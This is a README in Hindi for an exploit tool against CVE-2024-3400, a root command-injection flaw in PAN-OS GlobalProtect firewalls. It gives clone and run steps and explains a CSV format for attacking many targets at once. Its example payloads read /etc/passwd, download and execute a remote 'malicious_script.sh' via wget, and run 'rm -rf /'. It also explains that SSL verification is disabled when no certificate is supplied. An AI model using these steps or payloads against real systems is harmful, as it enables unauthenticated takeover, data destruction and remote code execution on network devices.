
CVE-2024-3400 के लिए एक्सप्लॉइट स्क्रिप्ट, जो PAN-OS GlobalProtect में एक कमांड इंजेक्शन है, जो रूट विशेषाधिकारों के साथ बिना प्रमाणीकरण के रिमोट कोड निष्पादन की अनुमति देता है। एकल और CSV-आधारित मल्टी-टारगेट एक्सप्लॉइटेशन का समर्थन करता है।
यह स्क्रिप्ट PAN-OS फ़ायरवॉल में कमजोरियों के शोषण को प्रदर्शित करने के लिए डिज़ाइन की गई है। यह फ़ायरवॉल के API एंडपॉइंट पर एक विशेष रूप से तैयार किया गया पेलोड भेजता है ताकि मनमाने कमांड निष्पादित किए जा सकें। यह एक्सप्लॉइट विशेष रूप से CVE-2024-3400 को लक्षित करता है, जो Palo Alto Networks PAN-OS सॉफ़्टवेयर के GlobalProtect सुविधा में एक कमांड इंजेक्शन कमजोरी है, जो विशिष्ट PAN-OS संस्करणों के लिए है। विशेष फ़ीचर कॉन्फ़िगरेशन एक अप्रमाणित हमलावर को फ़ायरवॉल पर रूट विशेषाधिकारों के साथ मनमाना कोड निष्पादित करने में सक्षम बना सकता है।
नोट: कृपया सुनिश्चित करें कि आप इस स्क्रिप्ट का उपयोग केवल कानूनी और नैतिक उद्देश्यों के लिए करें, और केवल उन मशीनों पर करें जिन पर आपको परीक्षण करने की अनुमति है।
इस प्रोजेक्ट का उपयोग करने के लिए, इन चरणों का पालन करें:
git clone https://github.com/Yuvvi01/CVE-2024-3400
cd CVE-2024-3400
pip install -r requirements.txt
python3 exploit.py
प्रॉम्प्ट्स का पालन करके कमजोर PAN-OS फ़ायरवॉल का IP पता और निष्पादित करने के लिए पेलोड दर्ज करें।
ls -la
cat /etc/passwd
whoami
wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
rm -rf /
स्क्रिप्ट PAN-OS फ़ायरवॉल सर्वर से SSL प्रमाणपत्र का फ़ाइल पथ पूछेगी। यदि कोई पथ नहीं दिया गया, तो स्क्रिप्ट स्वचालित रूप से SSL सत्यापन को गलत (false) पर सेट कर देगी, जिससे SSL प्रभावी रूप से अक्षम हो जाएगा।
यह स्क्रिप्ट आपको CSV फ़ाइल का उपयोग करके कमजोर PAN-OS फ़ायरवॉल के कई लक्ष्यों का शोषण करने की अनुमति देती है। नीचे CSV फ़ाइल को सही ढंग से फ़ॉर्मेट करने के निर्देश दिए गए हैं:
CSV फ़ाइल में तीन कॉलम होने चाहिए:
ipaddress: कमजोर PAN-OS फ़ायरवॉल का IP पता। payload: फ़ायरवॉल पर निष्पादित करने के लिए पेलोड। path/to/root_CA_certificate.pem: रूट CA प्रमाणपत्र का पथ (यदि प्रमाणपत्र सत्यापन अक्षम है तो खाली छोड़ें)।
ipaddress,payload,path/to/root_CA_certificate.pem
192.168.1.1,exploit_payload1,/path/to/certificate.pem
192.168.1.2,exploit_payload2,
निर्दिष्ट प्रारूप के साथ एक CSV फ़ाइल बनाएं। IP पते, पेलोड और रूट CA प्रमाणपत्र पथ (यदि लागू हो) भरें। सुनिश्चित करें कि रूट CA प्रमाणपत्रों के लिए मान्य पथ प्रदान करें या यदि प्रमाणपत्र सत्यापन अक्षम है तो फ़ील्ड खाली छोड़ दें। स्क्रिप्ट चलाएं और प्रॉम्प्ट होने पर CSV फ़ाइल का उपयोग करने का विकल्प चुनें।